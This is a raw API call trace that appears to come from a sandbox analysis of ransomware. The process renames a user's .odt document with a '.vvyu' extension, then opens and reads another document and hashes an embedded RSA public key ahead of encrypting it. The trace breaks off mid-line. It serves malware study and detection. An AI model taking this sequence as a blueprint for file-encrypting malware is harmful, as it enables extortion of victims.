[0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.150] GetCurrentThreadId () returned 0x66c [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4f00 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.151] GetCurrentThreadId () returned 0x66c [0196.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2dc8 [0196.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2de0 [0196.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e40 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e58 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2df8 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2dc8 [0196.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2dc8 | out: hHeap=0x620000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2df8 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2de0 | out: hHeap=0x620000) returned 1 [0196.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2db0 | out: hHeap=0x620000) returned 1 [0196.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0196.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1608 | out: hHeap=0x620000) returned 1 [0196.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.161] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x83b3, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x83b3, lpOverlapped=0x0) returned 1 [0196.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.162] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x83b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.162] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.163] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.163] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.164] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.164] CloseHandle (hObject=0x568) returned 1 [0196.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.166] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\bJu5IwGZcIVxDeaCzVA1.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\bju5iwgzcivxdeaczva1.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\bJu5IwGZcIVxDeaCzVA1.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\bju5iwgzcivxdeaczva1.odt.vvyu")) returned 1 [0196.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.172] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.175] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeff93000, ftCreationTime.dwHighDateTime=0x1d896fc, ftLastAccessTime.dwLowDateTime=0xd8cf2bb0, ftLastAccessTime.dwHighDateTime=0x1d8a542, ftLastWriteTime.dwLowDateTime=0xd8cf2bb0, ftLastWriteTime.dwHighDateTime=0x1d8a542, nFileSizeHigh=0x0, nFileSizeLow=0x18065, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FNDguil2uBhXleqMkv.odt", cAlternateFileName="FNDGUI~1.ODT")) returned 1 [0196.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.176] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\FNDguil2uBhXleqMkv.odt") returned=".odt" [0196.176] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\FNDguil2uBhXleqMkv.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\fndguil2ubhxleqmkv.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.176] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=98405) returned 1 [0196.177] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.180] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1803f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.180] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.183] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.183] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x18065, lpOverlapped=0x0) returned 1 [0196.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.185] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.185] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0196.186] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.186] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.186] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.186] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.187] GetLastError () returned 0x0 [0196.187] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.187] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0196.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.187] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.187] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.187] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18070) returned 0x2ea79b0 [0196.188] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1608 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d98 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1650 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2db0 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2de0 [0196.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.189] 